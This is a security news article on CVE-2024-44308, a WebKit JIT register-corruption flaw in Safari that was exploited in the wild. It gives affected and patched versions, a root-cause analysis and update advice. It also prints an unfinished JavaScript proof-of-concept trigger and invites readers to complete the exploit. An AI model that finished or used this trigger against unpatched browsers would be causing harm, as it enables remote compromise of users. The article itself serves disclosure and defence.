Thursday, January 23, 2025
HomeAppleApple Safari JavaScriptCore Remote Code Execution Flaw Exploited in the Wild

Apple Safari JavaScriptCore Remote Code Execution Flaw Exploited in the Wild

Published on

SIEM as a Service

Follow Us on Google News

A critical vulnerability identified as CVE-2024-44308 has been actively exploited in the wild, affecting multiple versions of Apple Safari across iOS, visionOS, and macOS platforms.

This flaw, located within WebKit’s DFG JIT compiler, poses a significant threat by allowing remote code execution (RCE).

Affected Software and Versions

Here’s a table summarizing the affected software and versions for the CVE-2024-44308 vulnerability:

SoftwareAffected VersionPatched Version
iOS17.7.1, 18.117.7.2, 18.1.1
visionOS2.12.1.1
macOS Sequoia15.115.1.1

Apple has addressed the issue in its latest updates: iOS 17.7.2, 18.1.1, visionOS 2.1.1, and macOS Sequoia 15.1.1.

Leveraging 2024 MITRE ATT&CK Results for SME & MSP Cybersecurity Leaders – Attend Free Webinar

Discovery and Analysis

The vulnerability was reported by Clément Lecigne and Benoît Sevens from Google’s Threat Analysis Group and further analyzed by Dohyun Lee of USELab, Korea University.

This flaw stems from a register corruption issue in JavaScriptCore, due to improper allocation timing of the scratch2GPR register within the Speculative JIT compiling process.

The flaw impacts the DFGSpeculativeJIT.cpp file in WebKit, specifically within the method of handling integer-typed arrays.

The critical error occurs when the scratch2GPR register is allocated after invoking the getIntTypedArrayStoreOperand() function, which can introduce an unnecessary register allocation if a slow path is taken.

This misallocation can create an inconsistent register state, posing potential security risks.

The patched code corrects the order of operations, ensuring that the scratch2GPR register is properly managed, and maintaining the integrity of the register state when a slow path is introduced.

The code flow contributing to this vulnerability can be summarized as follows:

  1. Call getIntTypedArrayStoreOperand(): The function is called to manage store operations in typed arrays.
  2. Add Slow Path: A slow path may be introduced, requiring careful management of registers.
  3. Incorrect Allocation: scratch2GPR is incorrectly allocated after the slow path, which is not utilized, leading to potential state inconsistencies.

Proof-of-Concept (PoC)

The PoC code, though unfinished, provides insight into triggering the vulnerability. It involves manipulating JavaScript objects and arrays to reach vulnerable functions, encouraging further exploration to complete the exploit.

var ab = new ArrayBuffer(8);
var arr = new Int32Array(ab);
const confuser = {
    valueOf() {
        gc();
        if (this.flag) {
            return {x: 0x41414141};
        }
        return 0x1234;
    },
    flag: false
};
function jitMe(arr) {
    let x = 0;
    for(let i = 0; i < 10000; i++) {
        if(i % 100 === 0) {
            confuser.flag = !confuser.flag;
            x = confuser;
        } else {
            x = i & 0xff;
        }
        arr[(i & 0xffff)] = x;
    }
    return arr;
}
for(let i = 0; i < 100; i++) {
    jitMe(arr);
}
jitMe(arr);

Users are strongly urged to update their devices to the latest software versions to mitigate the risk posed by this vulnerability.

This incident underscores the importance of timely software updates and continuous monitoring for security flaws. Apple’s response in quickly addressing this vulnerability highlights the ongoing efforts to secure its platforms against emerging threats.

Analyse Advanced Malware & Phishing Analysis With ANY.RUN Black Friday Deals : Get up to 3 Free Licenses.

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Critical Vulnerability in Next.js Framework Exposes Websites to Cache Poisoning and XSS Attacks

A new report has put the spotlight on potential security vulnerabilities within the popular...

New Cookie Sandwich Technique Allows Stealing of HttpOnly Cookies

The "Cookie Sandwich Attack" showcases a sophisticated way of exploiting inconsistencies in cookie parsing...

GhostGPT – Jailbreaked ChatGPT that Creates Malware & Exploits

Artificial intelligence (AI) tools have revolutionized how we approach everyday tasks, but they also...

Tycoon 2FA Phishing Kit Using Specially Crafted Code to Evade Detection

The rapid evolution of Phishing-as-a-Service (PhaaS) platforms is reshaping the threat landscape, enabling attackers...

API Security Webinar

Free Webinar - DevSecOps Hacks

By embedding security into your CI/CD workflows, you can shift left, streamline your DevSecOps processes, and release secure applications faster—all while saving time and resources.

In this webinar, join Phani Deepak Akella ( VP of Marketing ) and Karthik Krishnamoorthy (CTO), Indusface as they explores best practices for integrating application security into your CI/CD workflows using tools like Jenkins and Jira.

Discussion points

Automate security scans as part of the CI/CD pipeline.
Get real-time, actionable insights into vulnerabilities.
Prioritize and track fixes directly in Jira, enhancing collaboration.
Reduce risks and costs by addressing vulnerabilities pre-production.

More like this

Critical Vulnerability in Next.js Framework Exposes Websites to Cache Poisoning and XSS Attacks

A new report has put the spotlight on potential security vulnerabilities within the popular...

GhostGPT – Jailbreaked ChatGPT that Creates Malware & Exploits

Artificial intelligence (AI) tools have revolutionized how we approach everyday tasks, but they also...

Tycoon 2FA Phishing Kit Using Specially Crafted Code to Evade Detection

The rapid evolution of Phishing-as-a-Service (PhaaS) platforms is reshaping the threat landscape, enabling attackers...